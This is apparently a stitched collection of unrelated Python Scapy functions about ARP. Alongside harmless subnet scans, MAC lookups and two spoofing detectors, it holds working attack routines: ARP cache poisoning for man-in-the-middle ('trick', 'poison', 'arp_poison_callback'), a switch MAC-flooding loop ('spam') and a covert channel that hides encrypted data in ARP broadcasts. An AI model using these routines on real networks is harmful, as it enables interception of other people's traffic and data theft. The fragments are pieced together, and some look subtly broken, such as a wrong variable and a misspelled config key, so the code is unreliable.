def _arp_ping(mac_address, ip_address): result = False answered,unanswered = srp(Ether(dst=mac_address)/ARP(pdst=ip_address), timeout=1, verbose=False) if len(answered) > 0: for reply in answered: if reply[1].hwsrc == mac_address: if type(result) is not list: result = [] result.append(str(reply[1].psrc)) result = ', '.join(result) return result
def gen_external_frames(interface: str, ip: str, ports: Union[list, tuple], gateway: str) -> List[Ether]: """ Generates external frames. Throws ARPError if gateway is down """ arp_resp = srp1(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=gateway), timeout=5, iface=interface, verbose=0) if not arp_resp: raise ARPError( f"Unable to find MAC for gateway IP {gateway}. Is it up?") return [Ether(dst=arp_resp[ARP].hwsrc) / IP(dst=ip)]
def arping(iprange='192.168.30.0/24'): """ARPING function takes IP address or network, returns nested mac/ip list""" conf.verb=0 ans,unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=iprange), timeout=2) collection = [] for snd, rcv in ans: result = rcv.sprintf(r"%ARP.psrc% %Ether.src%").split() collection.append(result) return collection
def scanNetwork(): target_ip = "10.0.0.1/24" arp =ARP(pdst=target_ip) ether=Ether(dst="ff:ff:ff:ff:ff:ff") packet= ether/arp result=srp(packet,timeout=5,verbose=0)[0] clients=[] for sent, received in result: clients.append({'ip':received.psrc, 'mac':received.hwsrc}) logger.debug("MyView detected: %s", received.hwsrc) return clients
def cleanup(victim_ip, gateway_ip): """ Send ARP response from gateway to victim to restore correct behavior """ gateway_mac = ip_to_mac(gateway_ip) # gateway_ip says to victim_ip that "gateway_ip is at gateway_mac" arp_gateway_to_victim = ARP( op=ARP.is_at, pdst=victim_ip, psrc=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_mac ) send(arp_gateway_to_victim, verbose=0)
def trick(): pk = Ether(src=Config["my_mac"], dst=Config["phone_mac"]) / ARP( hwsrc=Config["my_mac"], psrc=Config["gate_ip"], hwdst=Config["phone_mac"], pdst=Config["phone_ip"], op=2) for i in range(50): sendp(pk, iface=argv["interface"]) pk_to_router = Ether(src=Config["my_mac"], dst=Config["gate_mac"]) / ARP( hwsrc=Config["my_mac"], psrc=Config["phone_ip"], hwdst=Config["gate_mac"], pdst=Config["gate_ip"], op=2) for i in range(50): sendp(pk_to_router, iface=argv["interface"])
def poison(iface, target, fake, n, s=1): ethernet = Ether() arp = ARP(pdst=target, psrc=fake, op="is-at") packet = ethernet / arp while n: sendp(packet, iface=iface) n -= 1 time.sleep(s)
def restore(router_ip, router_mac, target_ip, target_mac, interface): send(ARP(op=2, psrc=target_ip, hwsrc=target_mac, pdst=router_ip, hwdst='ff:ff:ff:ff:ff:ff'), iface=interface, count=5, inter=0.2, verbose=0) send(ARP(op=2, psrc=router_ip, hwsrc=router_mac, pdst=target_ip, hwdst='ff:ff:ff:ff:ff:ff'), iface=interface, count=5, inter=0.2, verbose=0)
def process_pkt(self, pkt): a = pkt[ARP] # op is a arp lookup if a.op == 1 and a.pdst == self.gateway_ip: res = Ether(src=self.gateway_mac, dst=a.hwsrc) / ARP( op="is-at", psrc=self.gateway_ip, hwsrc=self.gateway_mac, pdst=a.psrc, hwdst=a.hwsrc) self.int_sock.send(res)
def get_mac(ip): """Returns MAC address of any device connected to the network Similar as arp_scan() but it returns directly MAC address and not a list with other informations Args: ip (string): the ip of the victim """ request = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip) ans, _ = srp(request, timeout=2, retry=1, verbose=0) if ans: return ans[0][1].src
def rearp(self): for i in range(0, 2): sendp((Ether(src=self.SpoofedMacs[i], dst=self.SpoofedMacs[(i + 1) % 2]) / ARP(op=2, hwsrc=self.SpoofedMacs[i], psrc=self.SpoofedIps[i], hwdst=self.SpoofedMacs[(i + 1) % 2], pdst=self.SpoofedIps[(i + 1) % 2])), count=5, verbose=0)
def arping(iprange, interface): ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=iprange), iface=interface, timeout=2) print "\n IP <---> MAC\n" collection = [] for snd, rcv in ans: result = rcv.sprintf(r"%ARP.psrc% %Ether.src%").split() collection.append(result) return collection
def arp_scan(self): ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=self.network), timeout=self.config['scan_timeout'], retry=self.config['scan_retries']) for pck in ans: arp = pck[1]['ARP'] self.hosts.append( Host(arp.psrc, arp.hwsrc, self.config, self.network, self.gateway))
def broadcast_message(message, key=PYEXFIL_DEFAULT_PASSWORD): """ Send a message over ARP Broadcast :param message: Message to send as str. :param key: The parameter to use as key. :return None: """ msg = AESEncryptOFB(key=key, text=message) n_frame = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP( op=1, pdst="192.168.1.254") / Raw(load=msg) sendp(n_frame, verbose=False)
def __init__(self, ip, mac): ether = Ether() ether.src = mac # Default: network card mac arp = ARP() arp.op = arp.is_at arp.psrc = ip arp.hwsrc = mac self.arp = arp self.ether = ether
def get_mac_by_ip(interface, address): """ Resolves hardware address from IP by sending ARP request and receiving ARP response """ # ARP packet with operation 1 (who-is) packet = ARP(op=1, pdst=address) response = sr1(packet, timeout=3, verbose=0, iface=interface) if response is not None: return response.hwsrc
def get_mac_list(ip, interface, timeout=5, interval=0.3): available_mac_addresses = {} print(ip) ans, unans = srp(Ether(dst='ff:ff:ff:ff:ff:ff') / ARP(pdst=str(ip)), timeout=timeout, iface=interface, inter=interval) for snd, rcv in ans: available_mac_addresses[rcv.sprintf(r"%Ether.src%")] = rcv.sprintf( r"%ARP.psrc%") return available_mac_addresses
def arp_poison_callback(packet): # Got ARP request? if packet[ARP].op == 1: answer = Ether(dst=packet[ARP].hwsrc) / ARP() answer[ARP].op = 'is-at' answer[ARP].hwdst = packet[ARP].hwsrc answer[ARP].psrc = packet[ARP].pdst answer[ARP].pdst = packet[ARP].psrc print("Fooling " + packet[ARP].psrc + " that " + packet[ARP].pdst + " is me") sendp(answer, iface=sys.argv[1])
def get_mac(ip): """ Renvoie l'adresse MAC associée à l'adresse IP. """ p = Ether(dst=BROADCAST) / ARP( pdst=IP ) # On construit un paquet ARP qu'on broadcast pour demander qui a cette IP? ans = srp(p, timeout=3, verbose=False)[ 0] # envoie & reçoit le paquet p et on récupère les réponses à p return ans[0][1].hwsrc # on retourne l'adresse MAC.
def _return_to_normal(self): """This method is called when the daemon is stopping. First, sends a GARP broadcast request to all clients to tell them the real gateway. Then an ARP request is sent to every client, so that they answer the real gateway and update its ARP cache. """ # clients gratutious arp sendp( Ether(dst=ETHER_BROADCAST) / ARP(op=1, psrc=self.ipv4.gateway, pdst=self.ipv4.gateway, hwdst=ETHER_BROADCAST, hwsrc=self.ipv4.gate_mac))
def restore(target_ip, host_ip, verbose=True): target_mac = get_mac(target_ip) host_mac = get_mac(host_ip) arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, hwsrc=host_mac) send(arp_response, verbose=0, count=7) if verbose: print("[+] Sent to {} : {} is-at {}".format( target_ip, host_ip, host_mac))
def execute(self): config = get_config() self_ip = sr1(IP(dst="1.1.1.1", ttl=1) / ICMP(), verbose=0, timeout=config.network_timeout)[IP].dst arp_responses, _ = srp( Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(op=1, pdst=f"{self_ip}/24"), timeout=config.netork_timeout, verbose=0, ) # arp enabled on cluster and more than one pod on node if len(arp_responses) > 1: # L3 plugin not installed if not self.detect_l3_on_host(arp_responses): self.publish_event(PossibleArpSpoofing())
def originalMAC(IPaddr): # src --> maybe.. send packet and return output # 'op = 1' --> ARP request mode # 'timeout = 2' --> If 'ARP reply' is none for 2 secs, stop sending 'ARP request'. # 'verbose = 0' --> srp's report is hidden ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(op=1, pdst=IPaddr), timeout=2, iface=interface, verbose=0) for send, receive in ans: MACaddr = receive[Ether].src return MACaddr
def scan(ip=None): if ip is None: ip = "192.168.2.0/24" arp_request = ARP(pdst=ip) broadcast = Ether(dst="ff:ff:ff:ff:ff:ff") arp_request_broadcast = broadcast/arp_request answered_list = srp(arp_request_broadcast, timeout=1, verbose=False)[0] clients_list = [] for element in answered_list: client_dict = {"ip": element[1].psrc, "mac": element[1].hwsrc} clients_list.append(client_dict) return clients_list
def scanSubnet(ip): arp_pkt = Ether() / ARP() arp_pkt[ARP].pdst = ip arp_pkt[Ether].dst = "ff:ff:ff:ff:ff:ff" response = srp(arp_pkt, timeout=6, verbose=0)[0] hostsIPs = [] hostsMACs = [] for sent, received in response: hostsIPs.append(received.psrc) hostsMACs.append(received.src) return hostsIPs, hostsMACs
def spam(self): """ Begin spamming the switch with ARP packets from random MAC's """ arp = ARP(op=2, psrc='0.0.0.0', hwdst=self.switch) while self.running: pkt = Ether(src=RandMAC(), dst=self.switch) pkt /= arp sendp(pkt) self.sent += 1 if self.sent % 50 == 0: self.log_msg('Sent %d requests...' % (self.sent))
def arping(iface, ip): result = "" ans, uans = srp(Ether(dst="FF:FF:FF:FF:FF:FF") / ARP(pdst=ip), timeout=2, inter=0.1, verbose=False, iface=iface) if len(ans) > 0: for snd, rcv in ans: result = rcv.sprintf(r"%Ether.src%") return result
def _arp_ping(mac_address, ip_address): result = False answered, unanswered = srp(Ether(dst=mac_address) / ARP(pdst=ip_address), timeout=1, verbose=False) if len(answered) > 0: for reply in answered: result = [] result.append(str(reply[0].pdst)) result = ', '.join(result) return result
def execute(self): self_ip = sr1(IP(dst="1.1.1.1", ttl=1), ICMP(), verbose=0)[IP].dst arp_responses, _ = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(op=1, pdst="{}/24".format(self_ip)), timeout=3, verbose=0) # arp enabled on cluster and more than one pod on node if len(arp_responses) > 1: # L3 plugin not installed if not self.detect_l3_on_host(arp_responses): self.publish_event(PossibleArpSpoofing())
def rearp_targets(signal, frame): """Function to rearp targets when SIGNINT signal is fired. Arguments: signal {signal} -- Signal frame {frame} -- Stack frame or execution frame """ sleep(1) p_success("\n[+] Rearping Targets") r_mac = getmacbyip(host) pkt = Ether(src=r_mac, dst="ff:ff:ff:ff:ff:ff") / ARP( psrc=host, hwsrc=if_mac, op=2) sendp(pkt, inter=1, count=3, iface=interface) if args.reverse: t_mac = getmacbyip(args.target) r_pkt = Ether(src=t_mac, dst="ff:ff:ff:ff:ff:ff") / ARP( psrc=args.target, hwsrc=if_mac, op=2) sendp(r_pkt, inter=1, count=2, iface=interface) p_success("[+] Exiting!") sys.exit(0)